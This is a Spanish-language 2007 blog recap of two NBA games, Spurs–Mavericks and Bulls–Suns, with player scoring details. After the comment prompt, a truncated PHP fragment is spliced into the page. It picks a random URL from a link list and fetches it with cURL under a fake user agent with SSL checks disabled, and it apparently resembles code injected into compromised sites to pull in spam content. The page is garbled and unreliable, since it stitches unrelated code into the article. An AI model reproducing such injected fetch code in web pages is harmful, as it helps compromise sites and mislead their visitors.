La crónica (15/11/07)

16 de November de 2007 por Pow_Brolin

Jornada de cierto interés, a pesar de disputarse sólo dos partidos, y con tres amos de la noche: Hill, viviendo una nueva juventud, Microondas Barbosa, y un estilista del baloncesto: Ginóbili. En el duelo tejano, Dallas pasaba página deshaciéndose fácilmente de los actuales campeones. Mientras tanto, los Suns hundían un poco mas a Chicago.


Spurs 92 – Mavericks 105

Resultado algo engañoso ya que Dallas quitó el pie del acelerador al descanso (42-59) y rematando la faena al final del encuentro. Los Spurs mostraron poquita cosa, centrando su juego en el jugador más dominante de la liga, Duncan (24 puntos); desde el banco el mago del balón Ginóbili maravilló a todos con varias jugadas inverosímiles y si se llega a poner serio se marca un triple doble (25 puntos, 9 rebotes y 7 asistencias). A todo esto Parker continúa buscando la forma de encestar en el America Airlines Center (1/11 en tiros de campo). Dallas mostró un juego más alegre con la dirección de Harris y el buen baloncesto desplegado por sus compañeros. Josh Howard se convirtió en el hombre clave del equipo con 23 puntos, bien secundado por un Dirk a medio gas (17 puntos). Terry (18 puntos) y Stackhouse (10) desde el banco fueron los encargados de mantener el ritmo del partido.

Bulls 102 – Suns 112
Chicago no encuentra la senda de la victoria. Un balance de 6 derrotas y 1 solo triunfo es para para preocuparse si tenemos en cuenta el nivel de plantilla. Skiles dio entrada en el 5 inicial y minutos a Nocioni para que el equipo se impregnara de su espíritu luchador en detrimento de Tyrus, pero de momento ni con ésas rompen la racha negativa. Los Suns no necesitaron de sus dos estrellas (Nash & Amaré) para alzarse con la victoria. Hill continúa disfrutando de una nueva juventud en Phoenix y se dedicó a dar una lección de BA-LON-CES-TO a los yogurines rivales para finalizar el encuentro con 24 puntos. Barbosa, máximo anotador del encuentro desde el banco (25 puntos), y The Matrix (21 puntos y 9 rebotes) apuntillaron a los rojos. En Chicago los 23 puntos y 9 rebotes de Deng, los malos porcentajes de tiro de escopeta de feria Gordon (9/20) y el dominio de los tableros de Ben Wallace volvieron a ser insuficientes para conseguir la segunda victoria de la temporada.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>